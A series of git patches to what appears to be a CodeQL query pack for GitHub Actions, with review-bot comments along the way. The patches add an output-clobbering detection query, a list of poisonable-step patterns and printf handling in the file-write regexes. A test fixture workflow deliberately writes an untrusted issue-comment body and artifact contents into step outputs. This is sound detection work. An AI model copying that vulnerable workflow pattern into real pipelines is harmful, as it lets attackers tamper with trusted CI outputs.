From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 24 Jul 2024 18:28:09 +0200 Subject: [PATCH 0427/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 285ea6e1680..89923580de5 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.23 +version: 0.1.24 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index a51e583b32c..776f51b1732 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.23 +version: 0.1.24 groups: [actions, queries] suites: codeql-suites extractor: javascript From eaf034e8cb02b8fd84d14f1ae5e4614ec336c3db Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 25 Jul 2024 11:09:02 +0200 Subject: [PATCH 0428/1267] feat(config): Add pipx as poisonable step --- ql/lib/ext/config/poisonable_steps.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index 1e0abb02d44..e2742fd60a7 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -40,6 +40,7 @@ extensions: - ["phpstan"] - ["pip\\s+install\\s+-r"] - ["pip\\s+install\\s+--requirement"] + - ["pipx\\s+install\\s+\\."] - ["poetry"] - ["pylint"] - ["pytest"] From e3df12d77bd3f4af9c7435d01cd13b39b639db0b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 29 Jul 2024 22:37:47 +0200 Subject: [PATCH 0429/1267] Update Query suite --- .../codeql-suites/actions-code-scanning.qls | 19 ++----------------- 1 file changed, 2 insertions(+), 17 deletions(-) diff --git a/ql/src/codeql-suites/actions-code-scanning.qls b/ql/src/codeql-suites/actions-code-scanning.qls index 801b22b0005..ce3ff489335 100644 
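Review bot: The new entry `pipx\\s+install\\s+\\.` only covers the form where the local path follows `install` directly, so a step such as `pipx install --editable .` or `pipx install --force .` on a checked-out tree would not be classified as poisonable. Allowing optional flags before the path closes that gap, for example `- ["pipx\\s+install\\s+(-\\S+\\s+)*\\."]`. How the consumer anchors these patterns is not visible in the hunk, so this should be confirmed against a fixture.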
--- a/ql/src/codeql-suites/actions-code-scanning.qls +++ b/ql/src/codeql-suites/actions-code-scanning.qls @@ -1,26 +1,11 @@ - description: Standard Code Scanning queries for Actions -- queries: . - +- queries: '.' - include: - kind: - - problem - - path-problem - tags contain: - - security - - maintainability problem.severity: - error - recommendation - -- include: - kind: - - diagnostic - - exclude: - problem.severity: - - warning tags contain: - experimental - - testing - debug - - model-generator + From 06ec94e731dd0f4878e937e825345a4f4e5f3f65 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 29 Jul 2024 22:38:42 +0200 Subject: [PATCH 0430/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 89923580de5..395b875e1be 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.24 +version: 0.1.25 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 776f51b1732..290b58482bc 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.24 +version: 0.1.25 groups: [actions, queries] suites: codeql-suites extractor: javascript From da36924bb1098a89adcb425dc5532e966ca90ff2 Mon Sep 17 00:00:00 2001 
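Review bot: The rewritten `include` no longer constrains `kind` or `tags contain`, and the `exclude` list loses `testing` and `model-generator`, so every query in the pack with `error` or `recommendation` severity is now selected, whatever its kind or tagging. The separate `include` for `kind: diagnostic` is removed as well; if diagnostic queries carry no `@problem.severity` (not visible here), they drop out of the suite. If the aim is only to keep warning-level results out of code scanning, the severity list can be added while keeping the `kind` and `tags contain` constraints and the two removed exclusions. A one-line comment above the `include` stating that intent would make the filter easier to audit.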
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 30 Jul 2024 10:26:41 +0200 Subject: [PATCH 0431/1267] feat(queries): Add Output Clobbering query --- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 2 +- .../security/OutputClobberingQuery.qll | 103 ++++++++++++++---- .../Security/CWE-077/OutputClobberingHigh.ql | 37 +++++++ .../CWE-094/OutputClobberingMedium.ql | 31 ------ .../CWE-077/.github/workflows/output1.yml | 38 +++++++ .../CWE-077/OutputClobberingHigh.expected | 12 ++ .../CWE-077/OutputClobberingHigh.qlref | 1 + 7 files changed, 168 insertions(+), 56 deletions(-) create mode 100644 ql/src/Security/CWE-077/OutputClobberingHigh.ql delete mode 100644 ql/src/Security/CWE-094/OutputClobberingMedium.ql create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/output1.yml create mode 100644 ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.expected create mode 100644 ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.qlref diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index e16bc00f8ea..5d0d45c26c1 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -113,7 +113,7 @@ predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { run.getInScopeEnvVarExpr(var_name) = pred.asExpr() and succ.asExpr() = run.getScriptScalar() and ( - envToSpecialFile(["GITHUB_ENV", "GITHUB_PATH"], var_name, run, _) or + envToSpecialFile(["GITHUB_ENV", "GITHUB_OUTPUT", "GITHUB_PATH"], var_name, run, _) or envToArgInjSink(var_name, run, _) ) ) diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index f1811ed5762..a67be6e3562 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll 
@@ -1,43 +1,98 @@ private import actions private import codeql.actions.TaintTracking private import codeql.actions.dataflow.ExternalFlow -private import codeql.actions.security.CodeInjectionQuery private import codeql.actions.security.ArtifactPoisoningQuery -import codeql.actions.dataflow.FlowSources +private import codeql.actions.dataflow.FlowSteps import codeql.actions.DataFlow +import codeql.actions.dataflow.FlowSources -abstract class OutputClobberingSource extends Step { } +abstract class OutputClobberingSink extends DataFlow::Node { } -class RunOutputClobbering extends OutputClobberingSource, Run { - RunOutputClobbering() { - exists(UntrustedArtifactDownloadStep download, string script | - download.getAFollowingStep() = this and - this.getScript() = script and - exists(int i | - script.splitAt("\n", i).matches(["%GITHUB_OUTPUT%", "%::set-output name%"]) and - i < count(string line | line = script.splitAt("\n") | line) - 1 +/** + * Holds if a Run step declares an environment variable with contents from a local file. + * e.g. + * run: | + * echo "sha=$(cat test-results/sha-number)" >> $GITHUB_OUTPUT + * echo "sha=$(> $GITHUB_OUTPUT + */ +class OutputClobberingFromFileReadSink extends OutputClobberingSink { + OutputClobberingFromFileReadSink() { + exists(Run run, UntrustedArtifactDownloadStep step, string content, string key, string value | + this.asExpr() = run.getScriptScalar() and + step.getAFollowingStep() = run and + writeToGitHubOutput(run, content) and + extractVariableAndValue(content, key, value) and + // there is a different output variable in the same script + // TODO: key2/value2 should be declared before key/value + exists(string content2, string key2 | + writeToGitHubOutput(run, content2) and + extractVariableAndValue(content2, key2, _) and + not key2 = key + ) and + ( + outputsPartialFileContent(value) + or + // e.g. 
+ // FOO=$(cat test-results/sha-number) + // echo "FOO=$FOO" >> $GITHUB_OUTPUT + exists(string line, string var_name, string var_value | + run.getScript().splitAt("\n") = line + | + var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and + var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and + outputsPartialFileContent(var_value) and + ( + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + or + value.matches("$(echo %") and value.indexOf(var_name) > 0 + ) + ) ) ) } } /** - * A taint-tracking configuration for unsafe user input - * that is used to construct and evaluate a code script. + * Holds if a Run step declares an environment variable, uses it to declare env var. + * e.g. + * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * echo "FOO=$BODY" >> $GITHUB_OUTPUT */ -private module OutputClobberingConfig implements DataFlow::ConfigSig { - predicate isSource(DataFlow::Node source) { source.asExpr() instanceof OutputClobberingSource } - - predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink } - - predicate isAdditionalFlowStep(DataFlow::Node prev, DataFlow::Node succ) { - exists(StepsExpression e | - e.getTarget() = prev.asExpr() and - prev.asExpr() instanceof OutputClobberingSource and - succ.asExpr() = e +class OutputClobberingFromEnvVarSink extends OutputClobberingSink { + OutputClobberingFromEnvVarSink() { + exists(Run run, string var_name, string key | + envToSpecialFile("GITHUB_OUTPUT", var_name, run, key) and + // there is a different output variable in the same script + // TODO: key2/value2 should be declared before key/value + exists(string content2, string key2 | + writeToGitHubOutput(run, content2) and + extractVariableAndValue(content2, key2, _) and + not key2 = key + ) and + exists(run.getInScopeEnvVarExpr(var_name)) and + run.getScriptScalar() = this.asExpr() ) } } -/** Tracks flow of unsafe user input that is used to construct and evaluate a code script. 
*/ +class OutputClobberingFromMaDSink extends OutputClobberingSink { + OutputClobberingFromMaDSink() { madSink(this, "output-clobbering") } +} + +/** + * A taint-tracking configuration for unsafe user input + * that is used to construct and evaluate an environment variable. + */ +private module OutputClobberingConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + source instanceof RemoteFlowSource and + not source.(RemoteFlowSource).getSourceType() = "branch" + } + + predicate isSink(DataFlow::Node sink) { sink instanceof OutputClobberingSink } +} + +/** Tracks flow of unsafe user input that is used to construct and evaluate an environment variable. */ module OutputClobberingFlow = TaintTracking::Global; diff --git a/ql/src/Security/CWE-077/OutputClobberingHigh.ql b/ql/src/Security/CWE-077/OutputClobberingHigh.ql new file mode 100644 index 00000000000..a7016a50c58 --- /dev/null +++ b/ql/src/Security/CWE-077/OutputClobberingHigh.ql 
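Review bot: Both `OutputClobberingFromFileReadSink` and `OutputClobberingFromEnvVarSink` only require that some other key is written to `GITHUB_OUTPUT` anywhere in the same script; the ordering noted in `TODO: key2/value2 should be declared before key/value` is not enforced, so a script where the untrusted write comes first is reported the same way as the case in the test fixture marked VULNERABLE. Until ordering is modelled, the TODO should say which way it errs, e.g. `// NOTE: write order is not checked yet, so this over-reports when the untrusted write precedes the trusted one`. The QLDoc on both classes and on `OutputClobberingConfig` still speaks of declaring or evaluating "an environment variable", apparently carried over from the env-var query; something like `Holds if a Run step writes a step output whose value is read from a local file.` and `A taint-tracking configuration for untrusted input that is written to the step output file.` would match what the code does. The `not source.(RemoteFlowSource).getSourceType() = "branch"` exclusion in `isSource` also deserves a short why-comment.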
@@ -0,0 +1,37 @@ +/** + * @name Output Clobbering + * @description A Step output can be clobbered which may allow an attacker to manipulate the expected and trusted values of a variable. + * @kind path-problem + * @problem.severity error + * @security-severity 7.3 + * @precision high + * @id actions/output-clobbering/high + * @tags actions + * security + * experimental + * external/cwe/cwe-094 + * external/cwe/cwe-095 + * external/cwe/cwe-116 + */ + +import actions +import codeql.actions.security.OutputClobberingQuery +import codeql.actions.dataflow.ExternalFlow +import OutputClobberingFlow::PathGraph + +from OutputClobberingFlow::PathNode source, OutputClobberingFlow::PathNode sink +where + OutputClobberingFlow::flowPath(source, sink) and + inPrivilegedContext(sink.getNode().asExpr()) and + // exclude paths to file read sinks from non-artifact sources + ( + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" + or + source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + ( + sink.getNode() instanceof OutputClobberingFromFileReadSink or + madSink(sink.getNode(), "output-clobbering") + ) + ) +select sink.getNode(), source, sink, "Potential clobbering of a step output in $@.", sink, + sink.getNode().toString() diff --git a/ql/src/Security/CWE-094/OutputClobberingMedium.ql b/ql/src/Security/CWE-094/OutputClobberingMedium.ql deleted file mode 100644 index 7094a7891da..00000000000 --- a/ql/src/Security/CWE-094/OutputClobberingMedium.ql +++ /dev/null 
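Review bot: The comment `// exclude paths to file read sinks from non-artifact sources` does not describe the condition below it: the first disjunct accepts every sink for a non-artifact source, and it is the artifact branch that is narrowed to `OutputClobberingFromFileReadSink` or the MaD sink. Either the comment should read `// artifact sources are only reported when they reach a file-read or MaD sink`, or, if the comment states the intent, the first disjunct needs `and not sink.getNode() instanceof OutputClobberingFromFileReadSink`. Separately, the query lives under `Security/CWE-077` but its `@tags` list only `cwe-094`, `cwe-095` and `cwe-116`; adding `external/cwe/cwe-077` would keep the directory and the metadata in agreement.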
@@ -1,31 +0,0 @@ -/** - * @name Output Clobbering - * @description A Step output can be clobbered which may allow an attacker to manipulate the expected and trusted values of a variable. - * @kind path-problem - * @problem.severity warning - * @security-severity 5.0 - * @precision medium - * @id actions/output-clobbering/medium - * @tags actions - * security - * external/cwe/cwe-094 - * external/cwe/cwe-095 - * external/cwe/cwe-116 - */ - -import actions -import codeql.actions.security.OutputClobberingQuery -import OutputClobberingFlow::PathGraph - -from OutputClobberingFlow::PathNode source, OutputClobberingFlow::PathNode sink -where - OutputClobberingFlow::flowPath(source, sink) and - inPrivilegedContext(sink.getNode().asExpr()) and - // exclude cases where the sink is a JS script and the expression uses toJson - not exists(UsesStep script | - script.getCallee() = "actions/github-script" and - script.getArgumentExpr("script") = sink.getNode().asExpr() and - exists(getAToJsonReferenceExpression(sink.getNode().asExpr().(Expression).getExpression(), _)) - ) -select sink.getNode(), source, sink, "Potential output clobbering leading to code injection in $@.", - sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/output1.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/output1.yml new file mode 100644 index 00000000000..df583724998 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/output1.yml 
@@ -0,0 +1,38 @@ +on: + issue_comment: +jobs: + test1: + runs-on: ubuntu-latest + steps: + - id: clob1 + env: + BODY: ${{ github.event.comment.body }} + run: | + # VULNERABLE + echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT + echo "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT + - id: clob2 + run: | + echo ${{ steps.clob1.outputs.OUTPUT_1 }} + echo ${{ steps.clob1.outputs.OUTPUT_2 }} + test2: + runs-on: ubuntu-latest + steps: + - id: clob1 + env: + BODY: ${{ github.event.comment.body }} + run: | + # NOT VULNERABLE + echo "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT + test3: + runs-on: ubuntu-latest + steps: + - name: Download artifact + uses: dawidd6/action-download-artifact@v6 + with: + run_id: ${{ github.event.workflow_run.id }} + name: pr_number + - id: clob1 + run: | + echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT + echo "OUTPUT_2=$(> $GITHUB_OUTPUT diff --git a/ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.expected b/ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.expected new file mode 100644 index 00000000000..ea3261450ec --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.expected 
@@ -0,0 +1,12 @@ +edges +| .github/workflows/output1.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | provenance | | +| .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | provenance | | +nodes +| .github/workflows/output1.yml:9:18:9:49 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | semmle.label | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | +| .github/workflows/output1.yml:30:9:35:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | semmle.label | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | +subpaths +#select +| .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. 
| .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | +| .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | diff --git a/ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.qlref b/ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.qlref new file mode 100644 index 00000000000..5af047eec9e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.qlref @@ -0,0 +1 @@ +Security/CWE-077/OutputClobberingHigh.ql From f5261237a46cc27d3b474f5831813eff2de1081e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 30 Jul 2024 10:27:28 +0200 Subject: [PATCH 0432/1267] feat(suites): Add a bughalla-specific query suite --- ql/src/codeql-suites/actions-bughalla.qls | 6 ++++++ 1 file changed, 6 insertions(+) create mode 100644 ql/src/codeql-suites/actions-bughalla.qls diff --git a/ql/src/codeql-suites/actions-bughalla.qls b/ql/src/codeql-suites/actions-bughalla.qls new file mode 100644 index 00000000000..0d718fac616 --- /dev/null +++ b/ql/src/codeql-suites/actions-bughalla.qls @@ -0,0 +1,6 @@ +- description: Bughalla queries for Actions +- queries: '.' +- exclude: + tags contain: + - debug + From bf10603b5fafdfe75c10c0d786c4aeb4eccb4078 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 30 Jul 2024 10:28:15 +0200 Subject: [PATCH 0433/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 395b875e1be..7daf7247f25 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.25 +version: 0.1.26 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 290b58482bc..b844148e7a2 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.25 +version: 0.1.26 groups: [actions, queries] suites: codeql-suites extractor: javascript From 65ad387543d2aba815f7aa4966e81b82c0868963 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 30 Jul 2024 18:18:22 +0200 Subject: [PATCH 0434/1267] fix: Add printf as an equivalent to echo --- ql/lib/codeql/actions/Helper.qll | 22 +++++++++---------- .../security/EnvPathInjectionQuery.qll | 3 ++- .../actions/security/EnvVarInjectionQuery.qll | 3 ++- .../security/OutputClobberingQuery.qll | 3 ++- 4 files changed, 17 insertions(+), 14 deletions(-) diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index b08b62c8a58..cd964a6621d 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll 
@@ -74,7 +74,7 @@ predicate extractVariableAndValue(string raw_content, string key, string value) bindingset[script] predicate singleLineFileWrite(string script, string cmd, string file, string content, string filters) { exists(string regexp | - regexp = "(?i)(echo|write-output)\\s*(.*?)\\s*(>>|>)\\s*(\\S+)" and + regexp = "(?i)(echo|printf|write-output)\\s*(.*?)\\s*(>>|>)\\s*(\\S+)" and cmd = script.regexpCapture(regexp, 1) and file = trimQuotes(script.regexpCapture(regexp, 4)) and filters = "" and @@ -85,12 +85,12 @@ predicate singleLineFileWrite(string script, string cmd, string file, string con bindingset[script] predicate singleLineWorkflowCmd(string script, string cmd, string key, string value) { exists(string regexp | - regexp = "(?i)(echo|write-output)\\s*(['|\"])?::(set-[a-z]+)\\s*name\\s*=\\s*(.*?)::(.*)" and + regexp = "(?i)(echo|printf|write-output)\\s*(['|\"])?::(set-[a-z]+)\\s*name\\s*=\\s*(.*?)::(.*)" and cmd = script.regexpCapture(regexp, 3) and key = script.regexpCapture(regexp, 4) and value = trimQuotes(script.regexpCapture(regexp, 5)) or - regexp = "(?i)(echo|write-output)\\s*(['|\"])?::(add-[a-z]+)\\s*::(.*)" and + regexp = "(?i)(echo|printf|write-output)\\s*(['|\"])?::(add-[a-z]+)\\s*::(.*)" and cmd = script.regexpCapture(regexp, 3) and key = "" and value = trimQuotes(script.regexpCapture(regexp, 4)) 
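Review bot: Treating `printf` as a drop-in for `echo` in `singleLineFileWrite` and `singleLineWorkflowCmd` overlooks that its first argument is a format string: for a write like `printf "FOO=%s\n" "$BODY" >> $GITHUB_ENV` the content capture holds the format and the argument list together. Whether the key/value extraction downstream handles that shape is not visible in these hunks. The commit's diffstat lists only library files, so a fixture with a format-style `printf` write to `GITHUB_ENV` and `GITHUB_OUTPUT` would show whether the new alternation produces the intended sink. The same applies to the `linesFileWrite` and `blockFileWrite` hunks that follow.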
@@ -119,17 +119,17 @@ bindingset[script] predicate linesFileWrite(string script, string cmd, string file, string content, string filters) { exists(string regexp | regexp = - "(?msi).*(echo\\s+['|\"]?(.*?<<(\\S+))['|\"]?\\s*>>\\s*(\\S+)\\s*[\r\n]+)" + + "(?msi).*((echo|printf)\\s+['|\"]?(.*?<<(\\S+))['|\"]?\\s*>>\\s*(\\S+)\\s*[\r\n]+)" + "(((.*?)\\s*>>\\s*\\S+\\s*[\r\n]+)+)" + - "(echo\\s+['|\"]?(EOF)['|\"]?\\s*>>\\s*\\S+\\s*[\r\n]*).*" and + "((echo|printf)\\s+['|\"]?(EOF)['|\"]?\\s*>>\\s*\\S+\\s*[\r\n]*).*" and content = - trimQuotes(script.regexpCapture(regexp, 2)) + "\n" + "$(" + - trimQuotes(script.regexpCapture(regexp, 5)) + + trimQuotes(script.regexpCapture(regexp, 3)) + "\n" + "$(" + + trimQuotes(script.regexpCapture(regexp, 6)) + // TODO: there are some >> $GITHUB_ENV, >> $GITHUB_OUTPUT, >> "$GITHUB_ENV" lefotvers in content //.regexpReplaceAll("\\s*(>|>>)\\s*\\$[{]*" + file + "(.*?)[}]*", "") - ")\n" + trimQuotes(script.regexpCapture(regexp, 3)) and + ")\n" + trimQuotes(script.regexpCapture(regexp, 4)) and cmd = "echo" and - file = trimQuotes(script.regexpCapture(regexp, 4)) and + file = trimQuotes(script.regexpCapture(regexp, 5)) and filters = "" ) } @@ -146,8 +146,8 @@ predicate blockFileWrite(string script, string cmd, string file, string content, content = script .regexpCapture(regexp, 1) - .regexpReplaceAll("(?m)^[ ]*echo\\s*['\"](.*?)['\"]", "$1") - .regexpReplaceAll("(?m)^[ ]*echo\\s*", "") and + .regexpReplaceAll("(?m)^\\s*(echo|printf|write-output)\\s*['\"](.*?)['\"]", "$2") + .regexpReplaceAll("(?m)^\\s*(echo|printf|write-output)\\s*", "") and file = trimQuotes(script.regexpCapture(regexp, 4)) and cmd = "echo" and filters = "" diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index ee9f4843470..fc45b8c041d 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll 
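Review bot: The closing line of the heredoc pattern in `linesFileWrite` still requires the literal `(EOF)`, while the opening line captures any delimiter with `<<(\\S+)`, so a multi-line write that uses a different delimiter is not recognised and the sinks built on this predicate miss it. Since the regexp is being renumbered here anyway, the closing group could refer back to the captured delimiter (group 4 after this change) instead of the fixed word. Both `linesFileWrite` and `blockFileWrite` also keep `cmd = "echo"` after the alternation was added, unlike `singleLineFileWrite`, which binds `cmd` from the capture; in `linesFileWrite` that would be `cmd = script.regexpCapture(regexp, 2)`. Whether callers rely on the fixed value is not visible in the hunk.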
@@ -35,7 +35,8 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { ( value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") or - value.matches("$(echo %") and value.indexOf(var_name) > 0 + value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and + value.indexOf(var_name) > 0 ) ) ) diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 652b97b887f..f7a9283f800 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -37,7 +37,8 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { ( value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") or - value.matches("$(echo %") and value.indexOf(var_name) > 0 + value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and + value.indexOf(var_name) > 0 ) ) ) diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index a67be6e3562..4fe3268c00a 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll @@ -44,7 +44,8 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { ( value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") or - value.matches("$(echo %") and value.indexOf(var_name) > 0 + value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and + value.indexOf(var_name) > 0 ) ) ) From 8ffac2935e609166d772db15342b9084cbd04527 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 30 Jul 2024 18:22:20 +0200 Subject: [PATCH 0435/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 7daf7247f25..93f6688d2b4 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml 
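Review bot: Replacing `value.matches("$(echo %")` with `value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*")` changes more than the command list: `regexpMatch` has to match the whole string and `.` does not cross line breaks by default, so a `value` that spans several lines would, as far as I can tell, stop matching where the old wildcard did. Adding the dotall flag keeps the previous reach: `value.regexpMatch("(?s)\\$\\((echo|printf|write-output)\\s+.*")`. The identical two-line condition is pasted into `EnvPathInjectionQuery.qll`, `EnvVarInjectionQuery.qll` and `OutputClobberingQuery.qll`; a shared predicate next to the other helpers in `Helper.qll` would keep the three sinks from drifting apart. The enclosing class bodies start and end outside these hunks.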
